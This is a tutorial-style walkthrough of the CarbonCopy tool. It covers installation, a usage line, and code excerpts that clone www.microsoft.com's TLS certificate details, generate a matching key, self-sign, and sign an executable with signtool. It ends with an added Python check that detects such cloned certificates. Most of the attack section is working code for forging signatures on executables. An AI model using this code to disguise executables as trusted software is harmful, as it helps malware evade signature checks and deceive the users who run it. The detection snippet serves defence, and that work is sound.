Certificate Spoofing

Project URL:

https://github.com/paranoidninja/CarbonCopy

Installation

git clone https://github.com/paranoidninja/CarbonCopy.git
source /mnt/d/Project/python/venv3/bin/activate
apt-get install osslsigncode
pip3 install pyopenssl

Usage

python3 CarbonCopy.py www.microsoft.com 443 web编码转换工具.exe sign-web编码转换工具.exe

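Main functions in the code

Fetch the certificate of the host (www.microsoft.com)

# Download the server's certificate as PEM, then parse it into an X509 object
ogcert = ssl.get_server_certificate((host, int(port)))
x509 = crypto.load_certificate(crypto.FILETYPE_PEM, ogcert)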

Create the fake certificate

# Output paths for the cloned certificate, its private key and the PFX bundle
CNCRT   = certDir / (host + ".crt")
CNKEY = certDir / (host + ".key")
PFXFILE = certDir / (host + ".pfx")

Generate the key

# New RSA key pair with the same bit length as the original certificate's public key
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, ((x509.get_pubkey()).bits()))
cert = crypto.X509()

Load the certificate details from the original certificate and set them
print("[+] Cloning Certificate Version")
cert.set_version(x509.get_version())
print("[+] Cloning Certificate Serial Number")
cert.set_serial_number(x509.get_serial_number())
print("[+] Cloning Certificate Subject")
cert.set_subject(x509.get_subject())
print("[+] Cloning Certificate Issuer")
cert.set_issuer(x509.get_issuer())
print("[+] Cloning Certificate Registration & Expiration Dates")
cert.set_notBefore(x509.get_notBefore())
cert.set_notAfter(x509.get_notAfter())
cert.set_pubkey(k)
print("[+] Signing Keys")
cert.sign(k, 'sha256')

print("[+] Creating %s and %s" %(CNCRT, CNKEY))
CNCRT.write_bytes(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
CNKEY.write_bytes(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
print("[+] Clone process completed. Creating PFX file for signing executable...")
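
A defender-side check for the clone shown above, as an added example that is not CarbonCopy code: the copy keeps the original issuer name but is signed with its own newly generated key, so its signature verifies under its own public key even though issuer and subject differ. It assumes the `cryptography` package; the helper names and the certificates built in `demo()` are constructed for illustration.

```python
import datetime
from cryptography import x509
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID


def signed_by_own_key(cert):
    """True if the certificate's signature verifies under its own public key."""
    pub = cert.public_key()
    if not isinstance(pub, rsa.RSAPublicKey):
        return False  # this check only covers RSA, the key type the tool generates
    try:
        pub.verify(cert.signature, cert.tbs_certificate_bytes,
                   padding.PKCS1v15(), cert.signature_hash_algorithm)
        return True
    except InvalidSignature:
        return False


def looks_cloned(cert):
    """Issuer names another party, yet the signature was made with the cert's own key."""
    return cert.issuer != cert.subject and signed_by_own_key(cert)


def _name(cn):
    return x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])


def _make(subject_cn, issuer_cn, subject_key, signing_key):
    # Constructed test certificate; names and dates are sample values.
    start = datetime.datetime(2024, 1, 1)
    return (x509.CertificateBuilder()
            .subject_name(_name(subject_cn)).issuer_name(_name(issuer_cn))
            .public_key(subject_key.public_key()).serial_number(1000)
            .not_valid_before(start)
            .not_valid_after(start + datetime.timedelta(days=30))
            .sign(signing_key, hashes.SHA256()))


def demo():
    ca_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    leaf_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    genuine = _make("constructed.example", "Constructed CA", leaf_key, ca_key)
    cloned = _make("constructed.example", "Constructed CA", leaf_key, leaf_key)
    root = _make("Constructed CA", "Constructed CA", ca_key, ca_key)
    return {name: looks_cloned(c) for name, c in
            [("genuine", genuine), ("cloned", cloned), ("root", root)]}
```

An ordinary self-signed root is not flagged because its issuer equals its subject; only the mismatch combined with a self-made signature is.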

Attach the certificate

shutil.copy(signee, signed)
subprocess.check_call(["signtool.exe", "sign", "/v", "/f", PFXFILE,
"/d", "MozDef Corp", "/tr", TIMESTAMP_URL,
"/td", "SHA256", "/fd", "SHA256", signed])